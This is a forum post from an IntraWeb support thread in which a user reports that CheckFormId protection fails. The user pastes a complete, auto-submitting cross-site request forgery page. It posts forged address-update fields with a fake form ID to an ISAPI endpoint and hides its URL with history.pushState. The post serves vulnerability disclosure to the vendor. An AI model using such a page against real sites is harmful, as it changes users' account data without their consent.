Atozed Forums Atozed Software Products IntraWeb English IntraWeb General Discussion v
CheckFormId not working

Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Thread Modes
CheckFormId not working
rchristi12 Offline
Junior Member
**
Posts: 17
Threads: 5
Joined: Jul 2018
Reputation: 0
Location: New Jersey, USA
#6
09-03-2019, 05:27 PM
rchristi12 Wrote:Any update?  If there are specific details that I did not already provide in the thread that you need please let me know.  Thanks.

Alexandre Machado Wrote:I'll test it and let you know, although I don't have any details of your application....

The following is taken from the html page that successfully "attacked" my application.  Notice the FormID is a made up value (abc123).  When this page was loaded in another tab in the browser while my application was running it successfully updated the page in my application.  I look forward to your test results.  Thank you.

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form name="csrf_request" action="https://www.website.com/ISAPI.dll/$/" method="POST"> <input type="hidden" name="TXTADDR1" value="456 Fake St" />
<input type="hidden" name="TXTADDR2" value="" />
<input type="hidden" name="TXTADDR3" value="" /> <input type="hidden" name="TXTCITY" value="Anytown" /> <input type="hidden" name="TXTZIPCODE" value="53221" />
<input type="hidden" name="CBXFOREIGNADDR_CHECKBOX" value="off" />
<input type="hidden" name="TXTCOUNTRY" value="" /> <input type="hidden" name="TXTSTATE" value="WI" /> <input type="hidden" name="TXTBEGINDATE" value="12/27/2019" />
<input type="hidden" name="TXTENDDATE" value="12/28/2019" />
<input type="hidden" name="CMBLETTERDELIVERY" value="3" />
<input type="hidden" name="TXTFAX" value="" />
<input type="hidden" name="TXTEMAIL" value="" />
<input type="hidden" name="TXTASF" value="" />
<input type="hidden" name="BTTNASFCHANGE" value="" />
<input type="hidden" name="CMDUPDATE" value="" />
<input type="hidden" name="CMDCANCEL" value="" />
<input type="hidden" name="CMDELECTRONICDELIVERY" value="" />
<input type="hidden" name="CMDADDRESSUPDATE" value="" />
<input type="hidden" name="IW_FormName" value="frmTempAddrUpdate" />
<input type="hidden" name="IW_FormClass" value="TfrmTempAddrUpdate" />
<input type="hidden" name="IW_FormID_" value="abc123" />
<input type="hidden" name="IW_width" value="781" />
<input type="hidden" name="IW_height" value="739" />
<input type="hidden" name="IW_Action" value="CMDUPDATE" />
<input type="hidden" name="IW_ActionParam" value="" />
</form>
<script>csrf_request.submit()</script>
</body>
</html>
Find
Reply


Messages In This Thread
CheckFormId not working - by rchristi12 - 08-12-2019, 09:11 PM
RE: CheckFormId not working - by rchristi12 - 08-13-2019, 12:51 PM
RE: CheckFormId not working - by rchristi12 - 08-16-2019, 01:00 PM
RE: CheckFormId not working - by rchristi12 - 09-03-2019, 05:27 PM
RE: CheckFormId not working - by rchristi12 - 09-05-2019, 09:21 PM
RE: CheckFormId not working - by rchristi12 - 09-09-2019, 09:56 PM
RE: CheckFormId not working - by kudzu - 09-09-2019, 10:13 PM
RE: CheckFormId not working - by rchristi12 - 09-11-2019, 07:09 PM
RE: CheckFormId not working - by rchristi12 - 09-15-2019, 04:51 AM

Forum Jump:


Users browsing this thread: 1 Guest(s)